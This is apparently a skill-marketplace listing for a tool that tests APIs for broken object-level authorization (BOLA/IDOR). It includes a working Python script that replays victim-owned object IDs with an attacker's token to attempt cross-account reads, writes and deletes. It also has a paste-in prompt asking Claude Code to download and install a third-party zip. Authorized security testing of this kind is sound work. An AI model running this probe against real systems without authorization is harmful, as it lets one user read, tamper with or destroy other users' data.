testing-api-for-broken-object-level-authorization

Community

Detect object-level API authorization flaws

Author: Acczdy
Version: 1.0.0
Installs: 0

System Documentation

What problem does it solve?

This Skill helps security testers find Broken Object Level Authorization (BOLA/IDOR) vulnerabilities where authenticated users can access or modify resources belonging to other users by manipulating object identifiers in REST or GraphQL requests. It reduces manual trial-and-error by providing a structured methodology and automation to enumerate IDs, replay requests with different tokens, and identify read, write, and delete authorization gaps.

Core Features & Use Cases

  • Endpoint discovery & ID classification: Identify path, query, and body parameters that reference objects and classify them as sequential integers, UUIDs, slugs, or encoded values.
  • Automated attack simulation: Scripted tests for horizontal read, write, delete, batch, nested-resource, method-bypass, and ID enumeration scenarios with reporting of findings.
  • Tool integration: Guidance for using intercepting proxies (Burp Suite with the Autorize extension, OWASP ZAP), Postman, and Python requests-based automation for repeatable assessments.
  • Use Case: Perform OWASP API1:2023 assessments on a multi-tenant SaaS API to verify per-object authorization enforcement across endpoints and batch operations.

Quick Start

Run the BOLA agent against the target API with two authorized test accounts of the same role (one acting as the attacker, one as the victim) and a valid token for each. The agent enumerates object IDs reachable by the victim account, replays the same requests with the attacker's token, and reports any read, write, or delete that succeeds across accounts. Because the write and delete checks modify or destroy the victim's objects, run them only against disposable test data in an environment you are authorized to test.
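The following is an added example, not code shipped with this Skill or taken from the MoZiSec repository. It shows the two building blocks the feature list and Quick Start describe: an ID classifier (sequential integer, UUID, slug, encoded, opaque) and a replay loop that takes objects the victim account can read and retries GET, PUT and DELETE with the attacker's token, recording every cross-account success. The in-memory fake API, the `tok-alice`/`tok-bob` tokens, the `/api/invoices/{id}` route, and the Bearer header in the `requests` sender are all constructed assumptions for the demo; the same `probe_bola` function works unchanged against a real target through `make_requests_sender`.

```python
import base64
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

# A sender takes (method, path, token, json_body) and returns (status, body).
Sender = Callable[[str, str, str, Optional[dict]], Tuple[int, object]]

UUID_RE = re.compile(r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$", re.I)
SLUG_RE = re.compile(r"^[a-z0-9]+(?:-[a-z0-9]+)+$")


def classify_id(value: str) -> str:
    """Classify an object identifier by shape; integers are the easiest to enumerate."""
    if value.isdigit():
        return "sequential-int"
    if UUID_RE.match(value):
        return "uuid"
    if SLUG_RE.match(value):
        return "slug"
    try:  # base64 blobs often wrap a printable (and frequently sequential) value
        decoded = base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
        if decoded and all(32 <= b < 127 for b in decoded):
            return "encoded"
    except Exception:
        pass
    return "opaque"


@dataclass
class Finding:
    method: str
    path: str
    status: int
    note: str


def probe_bola(send: Sender, attacker_token: str, victim_token: str,
               path_template: str, victim_ids: List[str],
               write_body: Optional[dict] = None) -> List[Finding]:
    """Replay victim-owned object IDs with the attacker's token.

    Baseline: the owner must get 2xx. If the attacker gets 2xx (and, for reads,
    the same body) on the same object, per-object authorization is missing.
    """
    findings: List[Finding] = []
    for oid in victim_ids:
        path = path_template.format(id=oid)
        base_status, base_body = send("GET", path, victim_token, None)
        if not 200 <= base_status < 300:
            continue  # owner cannot read it either; no usable baseline
        st, body = send("GET", path, attacker_token, None)
        if 200 <= st < 300 and body == base_body:
            findings.append(Finding("GET", path, st, "cross-account read"))
        if write_body is not None:
            st, _ = send("PUT", path, attacker_token, write_body)
            if 200 <= st < 300:
                findings.append(Finding("PUT", path, st, "cross-account write"))
        st, _ = send("DELETE", path, attacker_token, None)  # last: destructive
        if 200 <= st < 300:
            findings.append(Finding("DELETE", path, st, "cross-account delete"))
    return findings


def make_fake_api(enforce_ownership: bool) -> Sender:
    """Constructed in-memory stand-in for a target API (not a real service).

    With enforce_ownership=False the API only checks that the token is valid,
    which is exactly the BOLA condition; with True it hides other users' objects.
    """
    sessions = {"tok-alice": "alice", "tok-bob": "bob"}  # assumed tokens
    store: Dict[str, dict] = {
        "101": {"owner": "alice", "note": "alice's invoice"},
        "102": {"owner": "bob", "note": "bob's invoice"},
    }

    def send(method, path, token, body):
        user = sessions.get(token)
        if user is None:
            return 401, None
        obj = store.get(path.rsplit("/", 1)[-1])
        if obj is None or (enforce_ownership and obj["owner"] != user):
            return 404, None  # hardened API hides existence instead of 403
        if method == "GET":
            return 200, dict(obj)
        if method == "PUT":
            obj.update(body or {})
            return 200, dict(obj)
        if method == "DELETE":
            store.pop(path.rsplit("/", 1)[-1])
            return 204, None
        return 405, None
    return send


def make_requests_sender(base_url: str) -> Sender:
    """Sender for a real target; assumes Bearer auth. Imported lazily so the
    offline demo runs without the requests module installed."""
    import requests

    def send(method, path, token, body):
        r = requests.request(method, base_url + path, json=body, timeout=10,
                             headers={"Authorization": f"Bearer {token}"})
        try:
            return r.status_code, r.json()
        except ValueError:
            return r.status_code, r.text
    return send


if __name__ == "__main__":
    for enforce in (False, True):
        hits = probe_bola(make_fake_api(enforce), "tok-alice", "tok-bob",
                          "/api/invoices/{id}", ["102"], write_body={"note": "tampered"})
        print(f"ownership enforced={enforce}: {len(hits)} finding(s)")
        for f in hits:
            print(" ", f.method, f.path, f.status, f.note)
```

The read check compares the attacker's response body to the owner's rather than trusting the status code alone, because some APIs answer 200 with an empty or generic body for objects the caller cannot see. Delete is probed last on each object so that a successful cross-account delete does not mask the read and write results.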

Dependency Matrix

Required Modules: requests

Components: scripts, references

💻 Claude Code Installation

Recommended: Let Claude install automatically. Simply copy and paste the text below to Claude Code.

Please help me install this Skill:
Name: testing-api-for-broken-object-level-authorization
Download link: https://github.com/Acczdy/MoZiSec/archive/main.zip#testing-api-for-broken-object-level-authorization

Please download this .zip file, extract it, and install it in the .claude/skills/ directory.
